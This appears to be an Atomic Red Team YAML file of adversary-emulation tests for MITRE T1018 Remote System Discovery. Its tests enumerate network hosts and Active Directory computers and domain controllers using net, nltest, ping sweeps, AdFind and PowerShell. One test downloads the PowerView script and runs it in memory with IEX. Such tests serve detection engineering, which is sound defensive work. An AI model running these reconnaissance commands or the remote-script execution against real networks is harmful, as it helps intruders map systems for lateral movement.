Atomic Red Team doc generator
437 lines
18 KiB
YAML
437 lines
18 KiB
YAML
attack_technique: T1018
|
|
display_name: Remote System Discovery
|
|
atomic_tests:
|
|
- name: Remote System Discovery - net
|
|
auto_generated_guid: 85321a9c-897f-4a60-9f20-29788e50bccd
|
|
description: |
|
|
Identify remote systems with net.exe.
|
|
|
|
Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
net view /domain
|
|
net view
|
|
name: command_prompt
|
|
- name: Remote System Discovery - net group Domain Computers
|
|
auto_generated_guid: f1bf6c8f-9016-4edf-aff9-80b65f5d711f
|
|
description: |
|
|
Identify remote systems with net.exe querying the Active Directory Domain Computers group.
|
|
|
|
Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
net group "Domain Computers" /domain
|
|
name: command_prompt
|
|
- name: Remote System Discovery - nltest
|
|
auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
|
|
description: |
|
|
Identify domain controllers for specified domain.
|
|
|
|
Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
target_domain:
|
|
description: Domain to query for domain controllers
|
|
type: string
|
|
default: '%userdnsdomain%'
|
|
executor:
|
|
command: |
|
|
nltest.exe /dclist:#{target_domain}
|
|
name: command_prompt
|
|
- name: Remote System Discovery - ping sweep
|
|
auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592
|
|
description: |
|
|
Identify remote systems via ping sweep.
|
|
|
|
Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
start_host:
|
|
description: Last octet starting value for ping sweep.
|
|
type: string
|
|
default: "1"
|
|
stop_host:
|
|
description: Last octet ending value for ping sweep.
|
|
type: string
|
|
default: "254"
|
|
subnet:
|
|
description: Subnet used for ping sweep.
|
|
type: string
|
|
default: 192.168.1
|
|
executor:
|
|
command: |
|
|
for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i
|
|
name: command_prompt
|
|
- name: Remote System Discovery - arp
|
|
auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574
|
|
description: |
|
|
Identify remote systems via arp.
|
|
|
|
Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
arp -a
|
|
name: command_prompt
|
|
- name: Remote System Discovery - arp nix
|
|
auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951
|
|
description: |
|
|
Identify remote systems via arp.
|
|
|
|
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
|
|
supported_platforms:
|
|
- linux
|
|
- macos
|
|
dependency_executor_name: sh
|
|
dependencies:
|
|
- description: |
|
|
Check if arp command exists on the machine
|
|
prereq_command: |
|
|
if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
|
|
get_prereq_command: |
|
|
(which yum && yum -y install net-tools)||(which apt-get && apt-get install -y net-tools)
|
|
executor:
|
|
command: |
|
|
arp -a | grep -v '^?'
|
|
name: sh
|
|
- name: Remote System Discovery - sweep
|
|
auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de
|
|
description: |
|
|
Identify remote systems via ping sweep.
|
|
|
|
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
|
|
supported_platforms:
|
|
- linux
|
|
- macos
|
|
input_arguments:
|
|
start_host:
|
|
description: Subnet used for ping sweep.
|
|
type: string
|
|
default: "1"
|
|
stop_host:
|
|
description: Subnet used for ping sweep.
|
|
type: string
|
|
default: "254"
|
|
subnet:
|
|
description: Subnet used for ping sweep.
|
|
type: string
|
|
default: 192.168.1
|
|
executor:
|
|
command: |
|
|
for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done
|
|
name: sh
|
|
- name: Remote System Discovery - nslookup
|
|
auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f
|
|
description: |
|
|
Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig.
|
|
|
|
Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
|
|
$pieces = $localip.split(".")
|
|
$firstOctet = $pieces[0]
|
|
$secondOctet = $pieces[1]
|
|
$thirdOctet = $pieces[2]
|
|
foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}
|
|
name: powershell
|
|
elevation_required: true
|
|
- name: Remote System Discovery - adidnsdump
|
|
auto_generated_guid: 95e19466-469e-4316-86d2-1dc401b5a959
|
|
description: |
|
|
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks
|
|
Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test.
|
|
Successful execution of this test will list dns zones in the terminal.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
user_name:
|
|
description: username including domain.
|
|
type: string
|
|
default: 'domain\user'
|
|
acct_pass:
|
|
description: Account password.
|
|
type: string
|
|
default: "password"
|
|
host_name:
|
|
description: hostname or ip address to connect to.
|
|
type: string
|
|
default: "192.168.1.1"
|
|
venv_path:
|
|
description: Path to the folder for the tactics venv
|
|
type: string
|
|
default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1018
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Computer must have python 3 installed
|
|
prereq_command: |
|
|
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
|
|
get_prereq_command: |
|
|
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
|
|
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
|
|
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
|
|
- description: |
|
|
Computer must have venv configured at #{venv_path}
|
|
prereq_command: |
|
|
if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit 1 }
|
|
get_prereq_command: |
|
|
py -m venv "#{venv_path}"
|
|
- description: |
|
|
adidnsdump must be installed
|
|
prereq_command: |
|
|
if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
|
|
get_prereq_command: |
|
|
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir adidnsdump 2>&1 | Out-Null
|
|
executor:
|
|
command: |
|
|
"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
|
|
name: command_prompt
|
|
elevation_required: true
|
|
- name: Adfind - Enumerate Active Directory Computer Objects
|
|
auto_generated_guid: a889f5be-2d54-4050-bd05-884578748bb4
|
|
description: |
|
|
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects
|
|
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
optional_args:
|
|
description: Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces.
|
|
type: string
|
|
default:
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
|
|
prereq_command: |
|
|
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
|
|
executor:
|
|
command: |
|
|
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=computer) #{optional_args}
|
|
name: command_prompt
|
|
- name: Adfind - Enumerate Active Directory Domain Controller Objects
|
|
auto_generated_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
|
|
description: |
|
|
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects
|
|
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
optional_args:
|
|
description: Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces.
|
|
type: string
|
|
default:
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
|
|
prereq_command: |
|
|
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
|
|
executor:
|
|
command: |
|
|
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -sc dclist
|
|
name: command_prompt
|
|
|
|
- name: Remote System Discovery - ip neighbour
|
|
auto_generated_guid: 158bd4dd-6359-40ab-b13c-285b9ef6fa25
|
|
description: |
|
|
Use the ip neighbour command to display the known link layer (ARP table) addresses for hosts sharing the same network segment.
|
|
supported_platforms:
|
|
- linux
|
|
dependency_executor_name: sh
|
|
dependencies:
|
|
- description: |
|
|
Check if ip command exists on the machine
|
|
prereq_command: |
|
|
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
|
|
get_prereq_command: |
|
|
apt-get install iproute2 -y
|
|
executor:
|
|
command: |
|
|
ip neighbour show
|
|
name: sh
|
|
|
|
- name: Remote System Discovery - ip route
|
|
auto_generated_guid: 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1
|
|
description: |
|
|
Use the ip route command to display the kernels routing tables.
|
|
supported_platforms:
|
|
- linux
|
|
dependency_executor_name: sh
|
|
dependencies:
|
|
- description: |
|
|
Check if ip command exists on the machine
|
|
prereq_command: |
|
|
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
|
|
get_prereq_command: |
|
|
apt-get install iproute2 -y
|
|
executor:
|
|
command: |
|
|
ip route show
|
|
name: sh
|
|
|
|
- name: Remote System Discovery - netstat
|
|
auto_generated_guid: d2791d72-b67f-4615-814f-ec824a91f514
|
|
description: |
|
|
Use the netstat command to display the kernels routing tables.
|
|
supported_platforms:
|
|
- linux
|
|
executor:
|
|
command: |
|
|
netstat -r | grep default
|
|
name: sh
|
|
|
|
- name: Remote System Discovery - ip tcp_metrics
|
|
auto_generated_guid: 6c2da894-0b57-43cb-87af-46ea3b501388
|
|
description: |
|
|
Use the ip tcp_metrics command to display the recent cached entries for IPv4 and IPv6 source and destination addresses.
|
|
supported_platforms:
|
|
- linux
|
|
dependency_executor_name: sh
|
|
dependencies:
|
|
- description: |
|
|
Check if ip command exists on the machine
|
|
prereq_command: |
|
|
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
|
|
get_prereq_command: |
|
|
apt-get install iproute2 -y
|
|
executor:
|
|
command: |
|
|
ip tcp_metrics show |grep --invert-match "^127\."
|
|
name: sh
|
|
- name: Enumerate domain computers within Active Directory using DirectorySearcher
|
|
auto_generated_guid: 962a6017-1c09-45a6-880b-adc9c57cb22e
|
|
description: |
|
|
This test is a Powershell script that enumerates Active Directory to determine computers that are joined to the domain.
|
|
This test is designed to mimic how SessionGopher can determine the additional systems within a domain, which has been used before by threat actors to aid in lateral movement.
|
|
Reference: [Head Fake: Tackling Disruptive Ransomware Attacks](https://www.mandiant.com/resources/head-fake-tackling-disruptive-ransomware-attacks).
|
|
Upon successful execution, this test will output the names of the computers that reside on the domain to the console window.
|
|
supported_platforms:
|
|
- windows
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: This PC must be joined to a domain.
|
|
prereq_command: |-
|
|
if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}
|
|
get_prereq_command: |-
|
|
write-host "This PC must be manually added to a domain."
|
|
executor:
|
|
command: |
|
|
$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
|
|
$DirectorySearcher.PropertiesToLoad.Add("Name")
|
|
$Computers = $DirectorySearcher.findall()
|
|
foreach ($Computer in $Computers) {
|
|
$Computer = $Computer.Properties.name
|
|
if (!$Computer) { Continue }
|
|
Write-Host $Computer}
|
|
name: powershell
|
|
elevation_required: false
|
|
- name: Enumerate Active Directory Computers with Get-AdComputer
|
|
auto_generated_guid: 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
|
|
description: |
|
|
The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
|
|
Upon successful execution a listing of Computers will output with their paths in AD.
|
|
Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
Get-AdComputer -Filter *
|
|
- name: Enumerate Active Directory Computers with ADSISearcher
|
|
auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
|
|
description: |
|
|
The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
|
|
Upon successful execution a listing of computers will output with their paths in AD.
|
|
Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
|
|
- name: Get-DomainController with PowerView
|
|
auto_generated_guid: b9d2e8ca-5520-4737-8076-4f08913da2c4
|
|
description: |
|
|
Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
|
|
name: powershell
|
|
- name: Get-WmiObject to Enumerate Domain Controllers
|
|
auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
|
|
description: |
|
|
The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
|
|
Upon successful execution a listing of Systems from AD will output with their paths.
|
|
Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop }
|
|
catch { $_; exit $_.Exception.HResult }
|
|
- name: Remote System Discovery - net group Domain Controller
|
|
auto_generated_guid: 5843529a-5056-4bc1-9c13-a311e2af4ca0
|
|
description: |
|
|
Identify remote systems with net.exe querying the Active Directory Domain Controller.
|
|
Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Controller" in the domain. Output will be via stdout.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
net group /domain "Domain controllers"
|
|
name: command_prompt
|
|
- name: Enumerate Remote Hosts with Netscan
|
|
auto_generated_guid: b8147c9a-84db-4ec1-8eee-4e0da75f0de5
|
|
description: This test uses Netscan to identify remote hosts in a specified network range.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
netscan_path:
|
|
description: NetScan exe location
|
|
type: path
|
|
default: 'PathToAtomicsFolder\..\ExternalPayloads\netscan\64-bit\netscan.exe'
|
|
range_to_scan:
|
|
description: The IP range to scan with Netscan
|
|
type: string
|
|
default: '127.0.0.1-127.0.0.1'
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Netscan must be installed
|
|
prereq_command: 'if (Test-Path "#{netscan_path}") {exit 0} else {exit 1}'
|
|
get_prereq_command: |
|
|
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
|
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" "https://www.softperfect.com/download/files/netscan_portable.zip"
|
|
Expand-Archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\netscan"
|
|
executor:
|
|
command: |-
|
|
cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt" /range:'#{range_to_scan}'
|
|
cleanup_command: |
|
|
remove-item "$env:temp\T1018NetscanOutput.txt" -force -erroraction silentlycontinue
|
|
name: powershell
|
|
elevation_required: false
|